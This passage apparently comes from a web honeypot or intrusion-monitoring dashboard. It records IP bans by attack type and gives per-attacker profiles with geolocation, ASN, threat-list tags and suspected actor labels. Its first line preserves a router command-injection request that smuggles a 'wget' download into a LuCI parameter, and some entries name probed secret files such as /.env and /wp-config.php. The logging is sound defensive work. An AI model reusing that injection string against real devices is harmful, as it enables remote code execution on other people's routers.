   "path": "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0\u2026",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T02:26:00+02:00",
   "ip": "66.240.223.240",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T02:32:00+02:00",
   "ip": "20.14.88.130",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T02:51:00+02:00",
   "ip": "34.237.176.214",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T02:54:00+02:00",
   "ip": "65.49.1.94",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T02:54:00+02:00",
   "ip": "223.123.92.102",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T03:04:00+02:00",
   "ip": "160.176.79.216",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T03:06:00+02:00",
   "ip": "165.99.207.153",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T03:14:00+02:00",
   "ip": "34.237.176.214",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T03:30:00+02:00",
   "ip": "94.243.10.91",
   "type": "command-injection",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T03:39:00+02:00",
   "ip": "45.138.12.21",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T03:56:00+02:00",
   "ip": "104.244.74.39",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T03:57:00+02:00",
   "ip": "49.0.202.115",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:04:00+02:00",
   "ip": "45.138.12.51",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:14:00+02:00",
   "ip": "20.214.109.68",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T04:18:00+02:00",
   "ip": "120.48.22.219",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:23:00+02:00",
   "ip": "165.154.218.226",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:24:00+02:00",
   "ip": "64.227.32.66",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T04:24:00+02:00",
   "ip": "143.244.168.161",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T04:39:00+02:00",
   "ip": "45.156.87.131",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T04:45:00+02:00",
   "ip": "40.124.186.184",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:52:00+02:00",
   "ip": "138.68.86.32",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:52:00+02:00",
   "ip": "207.154.197.113",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:52:00+02:00",
   "ip": "206.189.95.232",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:52:00+02:00",
   "ip": "147.182.149.75",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:54:00+02:00",
   "ip": "130.12.180.117",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T04:57:00+02:00",
   "ip": "45.153.102.164",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T05:29:00+02:00",
   "ip": "165.154.218.226",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-06T05:30:00+02:00",
   "ip": "103.146.23.23",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T05:31:00+02:00",
   "ip": "68.69.177.112",
   "type": "php-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T05:45:00+02:00",
   "ip": "45.138.12.10",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T05:48:00+02:00",
   "ip": "45.138.12.21",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  }
 ],
 "attackers": [
  {
   "ip": "20.219.185.206",
   "country": "India",
   "cc": "IN",
   "city": "Pune",
   "lat": 18.5204,
   "lon": 73.8567,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 185,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "edge"
   ],
   "notes": [
    "ban expired 18:30"
   ],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06"
   ]
  },
  {
   "ip": "20.214.109.68",
   "country": "South Korea",
   "cc": "KR",
   "city": "Yongsan-dong",
   "lat": 37.5503,
   "lon": 126.997,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 184,
   "first_seen": "2026-10-06T04:14:00+02:00",
   "last_seen": "2026-10-06T04:14:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [
    "ban expired 05:14"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "87.121.84.174",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 197170,
   "org": "TechTies Inc.",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 140,
   "first_seen": "2026-10-05T21:29:00+02:00",
   "last_seen": "2026-10-05T21:29:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1"
   ],
   "paths": [
    "/wp-config.php"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "45.138.12.27",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "credential-probe",
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 81,
   "first_seen": "2026-10-05T19:59:00+02:00",
   "last_seen": "2026-10-05T20:26:00+02:00",
   "sensors": [
    "edge",
    "web-1"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24"
   ],
   "paths": [
    "/api/phpinfo.php",
    "/database.sql"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "6 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "35.241.178.74",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "74.178.241.35.bc.googleusercontent.com",
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 81,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-1"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "49.0.202.115",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 136907,
   "org": "HUAWEI INTERNATIONAL PTE. LTD.",
   "ptr": "ecs-49-0-202-115.compute.hwclouds-dns.com",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": 48,
   "first_seen": "2026-10-06T03:57:00+02:00",
   "last_seen": "2026-10-06T03:57:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "banned until Tue 13 Oct 03:57"
   ],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "54.94.85.181",
   "country": "Brazil",
   "cc": "BR",
   "city": "S\u00e3o Paulo",
   "lat": -23.5558,
   "lon": -46.6396,
   "asn": 16509,
   "org": "Amazon.com, Inc.",
   "ptr": "ec2-54-94-85-181.sa-east-1.compute.amazonaws.com",
   "types": [
    "secret-probe",
    "credential-probe",
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 45,
   "first_seen": "2026-10-05T19:04:00+02:00",
   "last_seen": "2026-10-05T19:04:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 20:04"
   ],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [
    "/Jenkinsfile",
    "/wp-config.php.save"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06"
   ]
  },
  {
   "ip": "223.123.92.102",
   "country": "Pakistan",
   "cc": "PK",
   "city": "Karachi",
   "lat": 24.8607,
   "lon": 67.0011,
   "asn": 59257,
   "org": "CMPak Limited",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": 39,
   "first_seen": "2026-10-06T02:54:00+02:00",
   "last_seen": "2026-10-06T02:54:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "banned until Tue 08:54"
   ],
   "tags": [
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "193.32.204.199",
   "country": "Turkey",
   "cc": "TR",
   "city": "Istanbul",
   "lat": 41.0082,
   "lon": 28.9784,
   "asn": 153622,
   "org": "Madina IT",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": 32,
   "first_seen": "2026-10-05T19:33:00+02:00",
   "last_seen": "2026-10-05T19:33:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "banned until Tue 19:33"
   ],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06"
   ]
  },
  {
   "ip": "82.102.18.180",
   "country": "France",
   "cc": "FR",
   "city": "Saint-Denis",
   "lat": 48.9316,
   "lon": 2.35633,
   "asn": 9009,
   "org": "M247 Europe SRL",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 23,
   "first_seen": "2026-10-06T00:34:00+02:00",
   "last_seen": "2026-10-06T00:34:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 01:34"
   ],
   "tags": [
    "hosting-provider",
    "cluster:82.102.18.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "medium",
    "evidence": [
     "CMS, admin panel or PHP script probing",
     "2 addresses from 82.102.18.0/24 (AS9009) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "206.189.39.32",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore (Pioneer)",
   "lat": 1.32123,
   "lon": 103.695,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 6,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-2"
   ],
   "notes": [
    "not banned"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "74.161.160.33",
   "country": "Switzerland",
   "cc": "CH",
   "city": "Zurich",
   "lat": 47.3769,
   "lon": 8.54169,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 6,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-2"
   ],
   "notes": [
    "not banned"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "64.94.84.84",
   "country": "United States",
   "cc": "US",
   "city": "Dallas",
   "lat": 32.7767,
   "lon": -96.797,
   "asn": 399629,
   "org": "BL Networks",
   "ptr": null,
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 5,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-2"
   ],
   "notes": [
    "not banned"
   ],
   "tags": [
    "abuse-prone-hosting"
   ],
   "paths": [],
   "actor": {
    "label": "Known-bad scanning infrastructure",
    "confidence": "medium",
    "evidence": [
     "AS399629 BL Networks (abuse-prone hosting)"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "34.237.176.214",
   "country": "United States",
   "cc": "US",
   "city": "Ashburn",
   "lat": 39.0438,
   "lon": -77.4874,
   "asn": 14618,
   "org": "Amazon.com, Inc.",
   "ptr": "ec2-34-237-176-214.compute-1.amazonaws.com",
   "types": [
    "secret-probe"
   ],
   "bans": 7,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": 2,
   "first_seen": "2026-10-05T19:43:00+02:00",
   "last_seen": "2026-10-06T03:14:00+02:00",
   "sensors": [
    "edge",
    "web-1",
    "web-3"
   ],
   "notes": [
    "ban expired 05:35"
   ],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "165.154.218.226",
   "country": "United States",
   "cc": "US",
   "city": "Los Angeles",
   "lat": 34.0549,
   "lon": -118.243,
   "asn": 135377,
   "org": "UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": 2,
   "first_seen": "2026-10-06T04:23:00+02:00",
   "last_seen": "2026-10-06T05:29:00+02:00",
   "sensors": [
    "web-1",
    "web-3"
   ],
   "notes": [
    "banned until Tue 06:29"
   ],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "134.33.66.210",
   "country": "United States",
   "cc": "US",
   "city": "Phoenix",
   "lat": 33.4483,
   "lon": -112.073,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 1,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-1"
   ],
   "notes": [
    "not banned"
   ],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "45.148.10.171",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 3,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T18:10:00+02:00",
   "last_seen": "2026-10-05T18:11:00+02:00",
   "sensors": [
    "web-1",
    "web-2",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.148.10.0/24",
    "multi-night"
   ],
   "paths": [
    "/.env"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "2 addresses from 45.148.10.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "80.94.92.65",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 47890,
   "org": "UNMANAGED LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 3,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T00:20:00+02:00",
   "last_seen": "2026-10-06T00:21:00+02:00",
   "sensors": [
    "web-1",
    "web-2",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS47890 UNMANAGED LTD (abuse-prone hosting)",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "104.244.74.39",
   "country": "Luxembourg",
   "cc": "LU",
   "city": "Bissen",
   "lat": 49.7902,
   "lon": 6.08557,
   "asn": 53667,
   "org": "FranTech Solutions",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T22:58:00+02:00",
   "last_seen": "2026-10-06T03:56:00+02:00",
   "sensors": [
    "edge",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "138.68.86.32",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "b69efeaf93.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T22:39:00+02:00",
   "last_seen": "2026-10-06T04:52:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS b69efeaf93.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "193.32.126.155",
   "country": "France",
   "cc": "FR",
   "city": "Aubervilliers",
   "lat": 48.9075,
   "lon": 2.3718,
   "asn": 39351,
   "org": "31173 Services AB",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T21:09:00+02:00",
   "last_seen": "2026-10-05T21:38:00+02:00",
   "sensors": [
    "edge",
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "45.138.12.21",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T03:39:00+02:00",
   "last_seen": "2026-10-06T05:48:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.138.12.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "6 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "45.148.10.120",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe",
    "credential-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T01:12:00+02:00",
   "last_seen": "2026-10-06T01:22:00+02:00",
   "sensors": [
    "web-2",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.148.10.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "2 addresses from 45.148.10.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "66.240.223.214",
   "country": "United States",
   "cc": "US",
   "city": "San Diego (Kearny Mesa)",
   "lat": 32.8296,
   "lon": -117.134,
   "asn": 10439,
   "org": "CariNet, Inc.",
   "ptr": "pdcscan9.scanning.cybcube.com",
   "types": [
    "attack-tool"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:07:00+02:00",
   "last_seen": "2026-10-05T22:49:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "cluster:66.240.223.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "medium",
    "evidence": [
     "request carried a known attack-tool user agent",
     "2 addresses from 66.240.223.0/24 (AS10439) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "66.240.223.240",
   "country": "United States",
   "cc": "US",
   "city": "San Diego (Kearny Mesa)",
   "lat": 32.8296,
   "lon": -117.134,
   "asn": 10439,
   "org": "CariNet, Inc.",
   "ptr": "pdcscan5.scanning.cybcube.com",
   "types": [
    "attack-tool"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T00:06:00+02:00",
   "last_seen": "2026-10-06T02:26:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "cluster:66.240.223.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "medium",
    "evidence": [
     "request carried a known attack-tool user agent",
     "2 addresses from 66.240.223.0/24 (AS10439) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "68.69.177.112",
   "country": "United States",
   "cc": "US",
   "city": "Hollis",
   "lat": 42.7425,
   "lon": -71.5895,
   "asn": 402226,
   "org": "OnlyScans LLC",
   "ptr": "d5f757a6.scanners.onlyscans.net",
   "types": [
    "php-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T19:32:00+02:00",
   "last_seen": "2026-10-06T05:31:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "medium",
    "evidence": [
     "reverse DNS d5f757a6.scanners.onlyscans.net"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "102.220.163.155",
   "country": "Slovenia",
   "cc": "SI",
   "city": "Ljubljana",
   "lat": 46.0569,
   "lon": 14.5058,
   "asn": 197769,
   "org": "VPS Dedicated LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T21:25:00+02:00",
   "last_seen": "2026-10-05T21:25:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "103.146.23.23",
   "country": "Vietnam",
   "cc": "VN",
   "city": "T\u00e2y M\u1ed7",
   "lat": 20.9999,
   "lon": 105.742,
   "asn": 131366,
   "org": "Lanit Technology and Communication Joint Stock Company",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T05:30:00+02:00",
   "last_seen": "2026-10-06T05:30:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "103.216.170.129",
   "country": "India",
   "cc": "IN",
   "city": "Mumbai (Navjeevan Society)",
   "lat": 18.9681,
   "lon": 72.8239,
   "asn": 135198,
